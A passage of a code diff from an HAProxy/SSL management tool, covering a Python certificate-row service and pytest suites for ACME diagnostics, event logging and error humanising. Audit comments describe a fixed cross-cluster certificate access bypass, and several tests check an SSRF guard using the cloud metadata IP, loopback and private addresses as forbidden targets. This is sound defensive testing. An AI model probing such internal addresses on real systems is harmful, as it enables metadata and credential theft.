timezone-naive UTC; pre-normalisation drift caused inconsistent
`expires_in_days` math between rows created via the two flows."""
if not expiry:
return None
try:
if expiry.tzinfo is None:
expiry = expiry.replace(tzinfo=timezone.utc)
else:
expiry = expiry.astimezone(timezone.utc)
return expiry.astimezone(timezone.utc).replace(tzinfo=None)
except Exception as tz_error:
logger.warning(
"ssl_service._normalise_expiry_to_naive_utc: timezone "
f"conversion failed ({tz_error}); persisting NULL"
)
return None
def _recompute_status_from_expiry(
cert_info_status: str,
expiry_date: Optional[datetime],
cert_info_days: int,
) -> tuple[str, int]:
"""Mirror ssl.py:436-454 — recompute status + days_until_expiry
from the normalised expiry date so two SSL rows created on the
same cert have identical lifecycle fields regardless of the
creation flow.
Returns (status, days_until_expiry).
"""
if not expiry_date:
return cert_info_status or "valid", cert_info_days or 0
try:
now_utc = datetime.utcnow()
days_left = (expiry_date - now_utc).days
if days_left < 0:
return "expired", days_left
if days_left < 30:
return "expiring_soon", days_left
return "valid", days_left
except Exception as calc_error:
logger.warning(
"ssl_service._recompute_status_from_expiry: failed "
f"({calc_error}); falling back to parser-provided values"
)
return cert_info_status or "valid", cert_info_days or 0
async def create_cert_row(
conn,
payload: Any,
cluster_id: int,
) -> int:
"""Insert a row into ssl_certificates (always cluster_id=NULL) + junction
binding to the given cluster_id. Returns new ssl_certificate_id.
payload is expected to expose:
name, certificate_content, private_key_content, chain_content,
usage_type (optional, default 'frontend').
All cert metadata (primary_domain, all_domains, expiry_date,
issuer, fingerprint, status, days_until_expiry) is now parsed
FROM the PEM content via `parse_ssl_certificate` — operator-
supplied values on the payload are accepted as a graceful
fallback only when parsing fails (which itself raises 400).
"""
cert_content = getattr(payload, "certificate_content", None) or ""
if not cert_content.strip():
raise HTTPException(
status_code=400,
detail="ssl.certificate_content is empty — paste the PEM-encoded certificate.",
)
cert_info = parse_ssl_certificate(cert_content)
if cert_info.get("error"):
raise HTTPException(
status_code=400,
detail=f"Invalid SSL certificate: {cert_info['error']}",
)
private_key_content = getattr(payload, "private_key_content", None)
if private_key_content and not validate_private_key(private_key_content):
raise HTTPException(
status_code=400,
detail=(
"Invalid private key format — paste the PEM-encoded private "
"key. If the key is encrypted with a passphrase, decrypt it "
"first (`openssl rsa -in encrypted.key -out plain.key`) — "
"HAProxy cannot read passphrase-protected keys."
),
)
# Bulgu #23 (round-12 audit): cert and key MUST share the same
# public key. Pre-fix the upload paths validated cert and key
# independently, so mixing PEMs from different sites surfaced
# only at the agent's `haproxy -c` with an opaque
# "X509_check_private_key: key values mismatch" alert — by which
# point entities + PENDING version were already created.
if private_key_content:
from utils.ssl_parser import verify_certificate_key_match
match_result = verify_certificate_key_match(cert_content, private_key_content)
if match_result.get("match") is False:
raise HTTPException(
status_code=400,
detail=(
"SSL certificate and private key do not match — the "
"cert's public key differs from the private key's public "
"key. The pair likely belongs to two different sites or "
"a stale key was pasted. Re-export both PEM files from "
"the same issuance and try again."
),
)
chain_content = getattr(payload, "chain_content", None)
if chain_content and not validate_certificate_chain(chain_content):
raise HTTPException(
status_code=400,
detail="Invalid certificate chain format — paste the PEM-encoded chain.",
)
# Bulgu #24 (round-12 audit): refuse to create a row for an already
# EXPIRED certificate. Pre-fix the wizard / direct upload accepted
# certs with `status='expired'` from parse_ssl_certificate, the
# row was inserted, the wizard built an HTTPS frontend bound to
# it, and the agent deployed a cert that EVERY browser rejects
# at the TLS handshake. Recovery required noticing the broken
# site, rejecting the version, and re-uploading a valid cert.
# Hard-reject here so the operator sees a clear 400 at upload
# time instead of a runtime user-facing TLS failure.
if cert_info.get("status") == "expired":
days_past = cert_info.get("days_until_expiry", 0)
raise HTTPException(
status_code=400,
detail=(
f"SSL certificate is already expired ({-int(days_past) if isinstance(days_past, (int, float)) else 'unknown'} "
"days past notAfter). HAProxy will load it but every browser "
"TLS handshake will fail with NET::ERR_CERT_DATE_INVALID. "
"Replace with a non-expired certificate before deploying."
),
)
expiry_date = _normalise_expiry_to_naive_utc(cert_info.get("expiry_date"))
primary_domain = cert_info.get("primary_domain") or getattr(payload, "primary_domain", None)
all_domains = cert_info.get("all_domains") or getattr(payload, "all_domains", None) or (
[primary_domain] if primary_domain else []
)
issuer = cert_info.get("issuer") or getattr(payload, "issuer", None)
fingerprint = cert_info.get("fingerprint") or getattr(payload, "fingerprint", None)
status, days_until_expiry = _recompute_status_from_expiry(
cert_info.get("status", "valid"),
expiry_date,
cert_info.get("days_until_expiry", 0),
)
usage_type = getattr(payload, "usage_type", "frontend") or "frontend"
existing = await conn.fetchrow(
"""
SELECT s.id, s.is_active
FROM ssl_certificates s
LEFT JOIN ssl_certificate_clusters scc ON s.id = scc.ssl_certificate_id
WHERE s.name = $1
AND (
NOT EXISTS (
SELECT 1 FROM ssl_certificate_clusters
WHERE ssl_certificate_id = s.id
)
OR scc.cluster_id = $2
)
LIMIT 1
""",
payload.name,
cluster_id,
)
if existing and existing["is_active"]:
raise HTTPException(
status_code=400,
detail=(
f"SSL certificate with name '{payload.name}' already exists in this cluster. "
"Choose a different name or remove the existing one from SSL Management first."
),
)
if existing and not existing["is_active"]:
await conn.execute(
"""
DELETE FROM ssl_certificate_clusters WHERE ssl_certificate_id = $1
""",
existing["id"],
)
await conn.execute(
"""
UPDATE ssl_certificates
SET is_active = TRUE,
last_config_status = 'PENDING',
certificate_content = $2,
private_key_content = $3,
chain_content = $4,
primary_domain = $5,
all_domains = $6::jsonb,
expiry_date = $7,
usage_type = $8,
issuer = $9,
fingerprint = $10,
status = $11,
days_until_expiry = $12,
updated_at = CURRENT_TIMESTAMP
WHERE id = $1
""",
existing["id"],
cert_content,
private_key_content,
chain_content,
primary_domain,
json.dumps(all_domains),
expiry_date,
usage_type,
issuer,
fingerprint,
status,
days_until_expiry,
)
cert_id = existing["id"]
logger.info(
"ssl_service.create_cert_row: reactivated soft-deleted "
f"cert '{payload.name}' (id={cert_id}) via wizard parity path"
)
else:
cert_id = await conn.fetchval(
"""
INSERT INTO ssl_certificates (
name, primary_domain, certificate_content, private_key_content, chain_content,
expiry_date, issuer, fingerprint, status, days_until_expiry, all_domains,
is_active, cluster_id, last_config_status, usage_type
) VALUES (
$1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11::jsonb,
TRUE, NULL, 'PENDING', $12
)
RETURNING id
""",
payload.name,
primary_domain,
cert_content,
private_key_content,
chain_content,
expiry_date,
issuer,
fingerprint,
status,
days_until_expiry,
json.dumps(all_domains),
usage_type,
)
await ensure_cluster_junction(conn, cert_id, cluster_id)
return cert_id
async def ensure_cluster_junction(conn, ssl_certificate_id: int, cluster_id: int) -> None:
"""Idempotent insert into ssl_certificate_clusters (M11)."""
await conn.execute(
"""
INSERT INTO ssl_certificate_clusters (ssl_certificate_id, cluster_id)
VALUES ($1, $2)
ON CONFLICT (ssl_certificate_id, cluster_id) DO NOTHING
""",
ssl_certificate_id,
cluster_id,
)
async def select_existing_cert(conn, ssl_certificate_id: int, cluster_id: int) -> Optional[int]:
"""Validate that the cert exists AND is eligible for the given
cluster, then ensure cluster junction. Returns the cert id when
valid, else None.
R18b audit fix (round 4 #C — cert RBAC bypass): pre-fix this
helper only checked `is_active=TRUE` and then UNCONDITIONALLY
attached the cluster junction row. That meant an authenticated
operator with access to cluster B could reference any
cluster-A-bound cert id (or any global-but-not-junctioned cert)
and the wizard would silently bind it to cluster B. The
`GET /api/ssl/certificates` listing already enforces the correct
eligibility predicate ("global cert OR junction already includes
this cluster"); this helper now mirrors that predicate so the
wizard cannot grant access the listing forbids.
Eligibility rule (matches ssl.py listing):
- cert is "global" (no rows in ssl_certificate_clusters), OR
- cert is already bound to `cluster_id`.
"""
row = await conn.fetchrow(
"""
SELECT sc.id
FROM ssl_certificates sc
WHERE sc.id = $1
AND sc.is_active = TRUE
AND (
NOT EXISTS (
SELECT 1 FROM ssl_certificate_clusters
WHERE ssl_certificate_id = sc.id
)
OR EXISTS (
SELECT 1 FROM ssl_certificate_clusters
WHERE ssl_certificate_id = sc.id AND cluster_id = $2
)
)
""",
ssl_certificate_id,
cluster_id,
)
if not row:
return None
await ensure_cluster_junction(conn, ssl_certificate_id, cluster_id)
return row["id"]
async def validate_server_ca_bundle_eligibility(
conn, ssl_certificate_id: int, cluster_id: int
) -> bool:
"""R18b audit fix (round 4 #C): per-server `ssl_certificate_id`
(HAProxy `ca-file` for upstream verification) skipped any cluster
eligibility check pre-R18b — only DB FK integrity. That allowed
the same cross-cluster reference primitive as `select_existing_cert`.
The wizard now calls this validator before persisting the row.
Returns True iff the cert is active AND visible to the cluster
using the same eligibility rule as `select_existing_cert`.
"""
row = await conn.fetchrow(
"""
SELECT 1
FROM ssl_certificates sc
WHERE sc.id = $1
AND sc.is_active = TRUE
AND (
NOT EXISTS (
SELECT 1 FROM ssl_certificate_clusters
WHERE ssl_certificate_id = sc.id
)
OR EXISTS (
SELECT 1 FROM ssl_certificate_clusters
WHERE ssl_certificate_id = sc.id AND cluster_id = $2
)
)
LIMIT 1
""",
ssl_certificate_id,
cluster_id,
)
return row is not None
+508
View File
@@ -0,0 +1,508 @@
"""
v1.5.0 Feature A — services/acme_diagnostics.py per-check unit tests.
Each check is exercised with a mocked asyncpg connection (or no conn at all
for stdlib-only checks). DNS / port-80 are exercised through monkeypatched
asyncio primitives so the tests run hermetically — no real network.
"""
import asyncio
import json
import socket
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
from services.acme_diagnostics import (
CHECK_IDS,
_check_result,
check_account,
check_agents,
check_dns,
check_port80,
check_routing,
run_checks,
)
# ----------------------------------------------------------------------------
# _check_result schema invariants
# ----------------------------------------------------------------------------
def test_check_result_default_shape():
r = _check_result("dns", "DNS resolution", "ok", "all good")
assert set(r.keys()) >= {"id", "label", "status", "severity", "message", "details", "duration_ms"}
assert r["id"] == "dns"
assert r["status"] == "ok"
assert r["severity"] == "info"
assert r["details"] == {}
assert r["duration_ms"] is None
def test_check_ids_constant_order():
assert CHECK_IDS == ("dns", "port80", "routing", "account", "agents")
# ----------------------------------------------------------------------------
# DNS check
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_check_dns_all_resolve(monkeypatch):
def fake_gethostbyname_ex(domain):
return (domain, [], ["10.0.0.1"])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
out = await check_dns(["a.example.com", "b.example.com"])
assert out["status"] == "ok"
assert out["details"]["resolved"]["a.example.com"] == ["10.0.0.1"]
assert out["duration_ms"] is not None and out["duration_ms"] >= 0
@pytest.mark.asyncio
async def test_check_dns_failure_marks_fail(monkeypatch):
def fake_gethostbyname_ex(domain):
raise socket.gaierror("Name or service not known")
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
out = await check_dns(["nope.example.com"])
assert out["status"] == "fail"
assert out["severity"] == "error"
assert len(out["details"]["failed"]) == 1
assert out["details"]["failed"][0]["domain"] == "nope.example.com"
@pytest.mark.asyncio
async def test_check_dns_wildcard_skipped(monkeypatch):
"""*.example.com cannot be HTTP-01 validated — must NOT be resolved."""
called = []
def fake_gethostbyname_ex(domain):
called.append(domain)
return (domain, [], ["10.0.0.1"])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
out = await check_dns(["*.example.com"])
assert out["status"] == "ok"
assert called == [] # wildcard never reached the resolver
assert out["details"]["resolved"]["*.example.com"] == []
@pytest.mark.asyncio
async def test_check_dns_empty_ips_marks_failure(monkeypatch):
def fake_gethostbyname_ex(domain):
return (domain, [], [])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
out = await check_dns(["a.example.com"])
assert out["status"] == "fail"
assert "no A records" in out["details"]["failed"][0]["reason"]
# ----------------------------------------------------------------------------
# Port-80 check (HEAD probe)
# ----------------------------------------------------------------------------
class _FakeHEADResp:
def __init__(self, status):
self.status = status
async def __aenter__(self):
return self
async def __aexit__(self, *args):
return False
class _FakeSession:
def __init__(self, *, statuses=None, raise_timeout=False, raise_client_error=False):
self._statuses = list(statuses or [])
self._raise_timeout = raise_timeout
self._raise_client_error = raise_client_error
async def __aenter__(self):
return self
async def __aexit__(self, *args):
return False
def head(self, url, allow_redirects=False):
if self._raise_timeout:
raise asyncio.TimeoutError()
if self._raise_client_error:
import aiohttp
raise aiohttp.ClientError("connection refused")
status = self._statuses.pop(0) if self._statuses else 200
return _FakeHEADResp(status)
def _mock_public_dns(monkeypatch, ip="93.184.216.34"):
"""R18b round 4 #B: check_port80 now refuses to probe domains
whose A records point at private/loopback/metadata IP space
(SSRF guard). Tests that exercise the success path must
monkeypatch DNS to a public-looking IP so the guard allows the
probe through."""
def fake_gethostbyname_ex(domain):
return (domain, [], [ip])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
@pytest.mark.asyncio
async def test_check_port80_ok_on_200(monkeypatch):
_mock_public_dns(monkeypatch)
def _ctor(*args, **kwargs):
return _FakeSession(statuses=[200, 200])
monkeypatch.setattr("aiohttp.ClientSession", _ctor)
out = await check_port80(["a.example.com", "b.example.com"])
assert out["status"] == "ok"
assert all(t["ok"] for t in out["details"]["targets"])
@pytest.mark.asyncio
async def test_check_port80_ok_on_404(monkeypatch):
"""404 on /.well-known/acme-challenge/* is a valid 'served' signal."""
_mock_public_dns(monkeypatch)
def _ctor(*args, **kwargs):
return _FakeSession(statuses=[404])
monkeypatch.setattr("aiohttp.ClientSession", _ctor)
out = await check_port80(["a.example.com"])
assert out["status"] == "ok"
@pytest.mark.asyncio
async def test_check_port80_warn_on_egress_timeout(monkeypatch):
"""Corporate egress blocks port 80 outbound — warn, don't fail."""
_mock_public_dns(monkeypatch)
def _ctor(*args, **kwargs):
return _FakeSession(raise_timeout=True)
monkeypatch.setattr("aiohttp.ClientSession", _ctor)
out = await check_port80(["a.example.com"])
assert out["status"] == "warn"
assert out["severity"] == "warn"
@pytest.mark.asyncio
async def test_check_port80_skips_private_ip_for_ssrf_guard(monkeypatch):
"""R18b round 4 #B: SSRF guard. A domain that resolves to a
private/loopback/metadata IP must NOT trigger an outbound HTTP
request — the diagnostic must skip it with a warn-level row.
Pre-fix this was a usable SSRF primitive for any authenticated
operator."""
def fake_gethostbyname_ex(domain):
# AWS / GCP metadata IP — most dangerous SSRF target
return (domain, [], ["169.254.169.254"])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
# Track whether ClientSession.head was called — it must not be.
head_called = []
class _SpyClientSession:
def __init__(self, *args, **kwargs):
pass
async def __aenter__(self):
return self
async def __aexit__(self, *a, **k):
return None
def head(self, url, **kwargs):
head_called.append(url)
class _Resp:
async def __aenter__(self_inner):
self_inner.status = 200
return self_inner
async def __aexit__(self_inner, *a, **k):
return None
return _Resp()
monkeypatch.setattr("aiohttp.ClientSession", _SpyClientSession)
out = await check_port80(["evil.example.com"])
assert head_called == [], (
"SSRF guard regression: check_port80 issued an outbound HEAD "
"to a private-IP domain"
)
targets = out["details"]["targets"]
assert any("non-public" in (t.get("skip") or "") for t in targets), (
"SSRF guard regression: skip row missing for non-public IP"
)
@pytest.mark.asyncio
async def test_check_port80_skips_loopback_ip_for_ssrf_guard(monkeypatch):
"""SSRF guard must also block loopback (127.0.0.1)."""
def fake_gethostbyname_ex(domain):
return (domain, [], ["127.0.0.1"])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
head_called = []
class _SpyClientSession:
def __init__(self, *args, **kwargs):
pass
async def __aenter__(self):
return self
async def __aexit__(self, *a, **k):
return None
def head(self, url, **kwargs):
head_called.append(url)
raise RuntimeError("should never be called")
monkeypatch.setattr("aiohttp.ClientSession", _SpyClientSession)
out = await check_port80(["loopback.example.com"])
assert head_called == []
assert any("non-public" in (t.get("skip") or "") for t in out["details"]["targets"])
@pytest.mark.asyncio
async def test_check_port80_skips_rfc1918_for_ssrf_guard(monkeypatch):
"""SSRF guard must also block RFC1918 (10.0.0.0/8)."""
def fake_gethostbyname_ex(domain):
return (domain, [], ["10.0.0.42"])
monkeypatch.setattr(socket, "gethostbyname_ex", fake_gethostbyname_ex)
head_called = []
class _SpyClientSession:
def __init__(self, *args, **kwargs):
pass
async def __aenter__(self):
return self
async def __aexit__(self, *a, **k):
return None
def head(self, url, **kwargs):
head_called.append(url)
raise RuntimeError("should never be called")
monkeypatch.setattr("aiohttp.ClientSession", _SpyClientSession)
out = await check_port80(["internal.example.com"])
assert head_called == []
@pytest.mark.asyncio
async def test_check_port80_fail_on_client_error(monkeypatch):
_mock_public_dns(monkeypatch)
def _ctor(*args, **kwargs):
return _FakeSession(raise_client_error=True)
monkeypatch.setattr("aiohttp.ClientSession", _ctor)
out = await check_port80(["a.example.com"])
assert out["status"] == "fail"
assert out["severity"] == "error"
@pytest.mark.asyncio
async def test_check_port80_skipped_when_only_wildcards(monkeypatch):
"""We never probe wildcards (HTTP-01 is not applicable)."""
out = await check_port80(["*.example.com"])
assert out["status"] == "skipped"
@pytest.mark.asyncio
async def test_check_port80_fail_on_500(monkeypatch):
_mock_public_dns(monkeypatch)
def _ctor(*args, **kwargs):
return _FakeSession(statuses=[500])
monkeypatch.setattr("aiohttp.ClientSession", _ctor)
out = await check_port80(["a.example.com"])
assert out["status"] == "fail"
# ----------------------------------------------------------------------------
# Routing check
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_check_routing_warn_when_no_clusters():
conn = AsyncMock()
out = await check_routing(conn, ["a.example.com"], [])
assert out["status"] == "warn"
conn.fetch.assert_not_awaited()
@pytest.mark.asyncio
async def test_check_routing_fail_when_no_port80_frontend():
conn = AsyncMock()
conn.fetch.return_value = []
out = await check_routing(conn, ["a.example.com"], [1])
assert out["status"] == "fail"
assert "No HTTP frontend" in out["message"]
@pytest.mark.asyncio
async def test_check_routing_ok_when_port80_frontend_present():
conn = AsyncMock()
conn.fetch.return_value = [
{"id": 1, "name": "fe-http", "bind_address": "0.0.0.0", "bind_port": 80,
"mode": "http", "default_backend": "be"},
]
out = await check_routing(conn, ["a.example.com"], [1])
assert out["status"] == "ok"
assert len(out["details"]["frontends"]) == 1
# ----------------------------------------------------------------------------
# Account check
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_check_account_fail_when_no_account_id():
conn = AsyncMock()
out = await check_account(conn, None)
assert out["status"] == "fail"
assert "no ACME account id" in out["message"]
@pytest.mark.asyncio
async def test_check_account_fail_when_not_found():
conn = AsyncMock()
conn.fetchrow.return_value = None
out = await check_account(conn, 99)
assert out["status"] == "fail"
assert "Account 99 not found" in out["message"]
@pytest.mark.asyncio
async def test_check_account_fail_when_status_invalid():
conn = AsyncMock()
conn.fetchrow.return_value = {
"id": 1,
"email": "ops@example.com",
"status": "deactivated",
"account_url": "https://acme/acct/1",
}
out = await check_account(conn, 1)
assert out["status"] == "fail"
assert "deactivated" in out["message"]
@pytest.mark.asyncio
async def test_check_account_warn_when_url_missing():
conn = AsyncMock()
conn.fetchrow.return_value = {
"id": 1, "email": "ops@example.com",
"status": "valid", "account_url": None,
}
out = await check_account(conn, 1)
assert out["status"] == "warn"
@pytest.mark.asyncio
async def test_check_account_ok():
conn = AsyncMock()
conn.fetchrow.return_value = {
"id": 1, "email": "ops@example.com",
"status": "valid", "account_url": "https://acme/acct/1",
}
out = await check_account(conn, 1)
assert out["status"] == "ok"
assert out["severity"] == "info"
# ----------------------------------------------------------------------------
# Agents check
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_check_agents_warn_when_no_clusters():
conn = AsyncMock()
out = await check_agents(conn, [])
assert out["status"] == "warn"
conn.fetch.assert_not_awaited()
@pytest.mark.asyncio
async def test_check_agents_fail_when_none_registered():
conn = AsyncMock()
conn.fetch.return_value = []
out = await check_agents(conn, [1])
assert out["status"] == "fail"
@pytest.mark.asyncio
async def test_check_agents_warn_when_none_active():
conn = AsyncMock()
conn.fetch.return_value = [
{"id": 1, "hostname": "h1", "status": "offline", "last_heartbeat": None,
"cluster_id": 1, "cluster_name": "c1"},
]
out = await check_agents(conn, [1])
assert out["status"] == "warn"
@pytest.mark.asyncio
async def test_check_agents_ok_with_active():
conn = AsyncMock()
conn.fetch.return_value = [
{"id": 1, "hostname": "h1", "status": "active", "last_heartbeat": None,
"cluster_id": 1, "cluster_name": "c1"},
{"id": 2, "hostname": "h2", "status": "offline", "last_heartbeat": None,
"cluster_id": 1, "cluster_name": "c1"},
]
out = await check_agents(conn, [1])
assert out["status"] == "ok"
assert "1 of 2" in out["message"]
# ----------------------------------------------------------------------------
# run_checks orchestration
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_run_checks_full_suite_returns_all_five(monkeypatch):
monkeypatch.setattr(socket, "gethostbyname_ex",
lambda d: (d, [], ["10.0.0.1"]))
def _ctor(*args, **kwargs):
return _FakeSession(statuses=[200])
monkeypatch.setattr("aiohttp.ClientSession", _ctor)
conn = AsyncMock()
conn.fetch.return_value = []
conn.fetchrow.return_value = None
out = await run_checks(
conn,
domains=["a.example.com"],
cluster_ids=[1],
account_id=None,
)
ids = [c["id"] for c in out]
assert ids == ["dns", "port80", "routing", "account", "agents"]
@pytest.mark.asyncio
async def test_run_checks_only_filter(monkeypatch):
"""`only` lets the UI re-run a single check."""
conn = AsyncMock()
conn.fetchrow.return_value = {
"id": 1, "email": "x@y", "status": "valid", "account_url": "https://acme/1",
}
out = await run_checks(
conn, domains=["a.example.com"], cluster_ids=[1],
account_id=1, only=["account"],
)
assert len(out) == 1
assert out[0]["id"] == "account"
@pytest.mark.asyncio
async def test_run_checks_unknown_only_returns_empty():
conn = AsyncMock()
out = await run_checks(
conn, domains=["a.example.com"], cluster_ids=[1],
account_id=None, only=["bogus"],
)
assert out == []
+256
View File
@@ -0,0 +1,256 @@
"""
v1.5.0 Feature A — record_event() and prune_acme_events_and_drafts_if_due() unit tests.
These tests validate:
* happy-path INSERT shape against acme_order_events,
* silent failure when the underlying table is missing (older deployments),
* conn-reuse path doesn't open/close a pool connection,
* daily-watermark logic correctly skips reruns within 24h.
"""
import json
from datetime import datetime, timedelta
from unittest.mock import AsyncMock, patch, MagicMock
import pytest
from utils.activity_log import (
record_event,
prune_acme_events_and_drafts_if_due,
)
# ----------------------------------------------------------------------------
# record_event happy path
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_record_event_happy_path_with_provided_conn():
conn = AsyncMock()
conn.fetchval.return_value = 42
row_id = await record_event(
order_id=100,
event_type="acme.order.created",
severity="info",
message="Test event",
details={"foo": "bar"},
correlation_id="corr-123",
conn=conn,
)
assert row_id == 42
conn.fetchval.assert_awaited_once()
args = conn.fetchval.call_args.args
sql = args[0]
assert "INSERT INTO acme_order_events" in sql
# Positional args after the SQL template
assert args[1] == 100 # order_id
assert args[2] == "acme.order.created" # event_type
assert args[3] == "INFO" # severity normalized upper
assert args[4] == "Test event" # message
parsed_details = json.loads(args[5])
assert parsed_details == {"foo": "bar"}
assert args[6] == "corr-123"
@pytest.mark.asyncio
async def test_record_event_severity_uppercased_default_info():
conn = AsyncMock()
conn.fetchval.return_value = 1
await record_event(order_id=1, event_type="x", conn=conn)
args = conn.fetchval.call_args.args
assert args[3] == "INFO"
@pytest.mark.asyncio
async def test_record_event_dict_details_serialized_to_json():
conn = AsyncMock()
conn.fetchval.return_value = 7
await record_event(
order_id=1,
event_type="x",
details={"k": [1, 2, 3], "nested": {"a": True}},
conn=conn,
)
args = conn.fetchval.call_args.args
parsed = json.loads(args[5])
assert parsed == {"k": [1, 2, 3], "nested": {"a": True}}
@pytest.mark.asyncio
async def test_record_event_none_details_serialized_to_empty_object():
conn = AsyncMock()
conn.fetchval.return_value = 1
await record_event(order_id=1, event_type="x", details=None, conn=conn)
args = conn.fetchval.call_args.args
parsed = json.loads(args[5])
assert parsed == {}
# ----------------------------------------------------------------------------
# record_event resilience
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_record_event_swallows_db_error_returns_none():
"""If the table doesn't exist or the DB rejects the insert, NEVER raise."""
conn = AsyncMock()
conn.fetchval.side_effect = Exception(
'relation "acme_order_events" does not exist'
)
row_id = await record_event(order_id=1, event_type="x", conn=conn)
assert row_id is None
@pytest.mark.asyncio
async def test_record_event_swallows_outer_failure_when_pool_unavailable():
"""If get_database_connection itself raises (pool exhausted), still return None."""
with patch(
"utils.activity_log.get_database_connection",
side_effect=Exception("pool exhausted"),
):
row_id = await record_event(order_id=1, event_type="x")
assert row_id is None
@pytest.mark.asyncio
async def test_record_event_acquires_and_releases_own_conn():
"""When no conn is supplied we must open one and release it."""
fake_conn = AsyncMock()
fake_conn.fetchval.return_value = 99
with patch(
"utils.activity_log.get_database_connection",
AsyncMock(return_value=fake_conn),
) as mocked_get, patch(
"utils.activity_log.close_database_connection",
AsyncMock(),
) as mocked_close:
row_id = await record_event(order_id=1, event_type="x")
assert row_id == 99
mocked_get.assert_awaited_once()
mocked_close.assert_awaited_once_with(fake_conn)
@pytest.mark.asyncio
async def test_record_event_does_not_close_caller_provided_conn():
"""When conn is passed in, we must NOT close it."""
conn = AsyncMock()
conn.fetchval.return_value = 1
with patch(
"utils.activity_log.close_database_connection",
AsyncMock(),
) as mocked_close:
await record_event(order_id=1, event_type="x", conn=conn)
mocked_close.assert_not_awaited()
# ----------------------------------------------------------------------------
# prune_acme_events_and_drafts_if_due — daily watermark
# ----------------------------------------------------------------------------
@pytest.mark.asyncio
async def test_prune_skips_when_last_run_is_recent():
"""If acme.events_last_pruned_at is < 24h old, skip the DELETE."""
fake_conn = AsyncMock()
recent = (datetime.utcnow() - timedelta(hours=1)).isoformat() + "Z"
fake_conn.fetchrow.return_value = {"value": json.dumps(recent)}
with patch(
"utils.activity_log.get_database_connection",
AsyncMock(return_value=fake_conn),
), patch(
"utils.activity_log.close_database_connection",
AsyncMock(),
):
out = await prune_acme_events_and_drafts_if_due()
assert out == {"acme_events": 0, "wizard_drafts": 0}
# Assert NO DELETE was issued: every conn.execute call was for INSERT or never called.
delete_calls = [
c for c in fake_conn.execute.call_args_list
if c.args and "DELETE" in c.args[0]
]
assert delete_calls == []
@pytest.mark.asyncio
async def test_prune_runs_when_last_run_is_stale():
"""If watermark is > 24h old, prune executes and watermark updates."""
fake_conn = AsyncMock()
stale = (datetime.utcnow() - timedelta(hours=48)).isoformat() + "Z"
# First fetchrow is for acme key, second for wizard key.
fake_conn.fetchrow.side_effect = [
{"value": json.dumps(stale)},
{"value": json.dumps(stale)},
]
# asyncpg returns "DELETE <n>" string for DELETE statements.
fake_conn.execute.side_effect = [
"DELETE 5", # acme_order_events delete
"INSERT 0 1", # watermark upsert for acme
"DELETE 2", # wizard_drafts delete
"INSERT 0 1", # watermark upsert for wizard
]
with patch(
"utils.activity_log.get_database_connection",
AsyncMock(return_value=fake_conn),
), patch(
"utils.activity_log.close_database_connection",
AsyncMock(),
):
out = await prune_acme_events_and_drafts_if_due()
assert out == {"acme_events": 5, "wizard_drafts": 2}
# Verify both DELETE queries were issued.
delete_sqls = [
c.args[0] for c in fake_conn.execute.call_args_list
if c.args and "DELETE" in c.args[0]
]
assert any("acme_order_events" in s for s in delete_sqls)
assert any("wizard_drafts" in s for s in delete_sqls)
@pytest.mark.asyncio
async def test_prune_runs_on_first_run_when_watermark_missing():
"""Missing watermark row should NOT block first-run prune."""
fake_conn = AsyncMock()
fake_conn.fetchrow.return_value = None
fake_conn.execute.side_effect = [
"DELETE 0", "INSERT 0 1",
"DELETE 0", "INSERT 0 1",
]
with patch(
"utils.activity_log.get_database_connection",
AsyncMock(return_value=fake_conn),
), patch(
"utils.activity_log.close_database_connection",
AsyncMock(),
):
out = await prune_acme_events_and_drafts_if_due()
assert out == {"acme_events": 0, "wizard_drafts": 0}
@pytest.mark.asyncio
async def test_prune_swallows_top_level_db_failure():
"""If the connection itself fails, return zeros, never raise."""
with patch(
"utils.activity_log.get_database_connection",
side_effect=Exception("db down"),
):
out = await prune_acme_events_and_drafts_if_due()
assert out == {"acme_events": 0, "wizard_drafts": 0}
+171
View File
@@ -0,0 +1,171 @@
"""
v1.5.0 Feature A — humanize_error_detail() unit tests.
Table-driven coverage of the RFC8555 problem types we humanize, plus
backwards-compatible behaviour for legacy plain-string error_detail values
that were written by v1.3.x and earlier.
"""
import json
import pytest
from services.acme_diagnostics import humanize_error_detail, _PROBLEM_HUMANIZED
# ----------------------------------------------------------------------------
# 1. Static coverage — we promise >= 11 RFC8555 problem types are humanized.
# ----------------------------------------------------------------------------
def test_humanizes_at_least_11_rfc8555_problem_types():
assert len(_PROBLEM_HUMANIZED) >= 11
def test_every_humanized_entry_has_title_and_hint():
for ptype, body in _PROBLEM_HUMANIZED.items():
assert "title" in body and body["title"], ptype
assert "hint" in body, ptype
# ----------------------------------------------------------------------------
# 2. Empty / None handling.
# ----------------------------------------------------------------------------
def test_none_returns_no_error_marker():
out = humanize_error_detail(None)
assert out["title"] == "No error"
assert out["message"] == ""
def test_empty_string_returns_no_error_marker():
out = humanize_error_detail("")
assert out["title"] == "No error"
# ----------------------------------------------------------------------------
# 3. Legacy plain-string fallback (pre-v1.5.0 stored unstructured strings).
# ----------------------------------------------------------------------------
def test_legacy_plain_string_falls_back_cleanly():
out = humanize_error_detail("connection refused: agent offline")
assert out["title"] == "ACME error"
assert "connection refused" in out["message"]
# The hint is empty because we don't have a structured problem type.
assert out["hint"] == ""
assert out["raw"] == "connection refused: agent offline"
def test_legacy_plain_string_with_brace_but_invalid_json_falls_back():
# Defensive: '{' prefix is the trigger for JSON parse, but garbled JSON
# must NOT raise. It should fall through to the legacy string path.
out = humanize_error_detail("{not valid json{")
assert out["title"] == "ACME error"
assert out["raw"] == "{not valid json{"
# ----------------------------------------------------------------------------
# 4. Structured RFC8555 problem types — table-driven across 11+ entries.
# ----------------------------------------------------------------------------
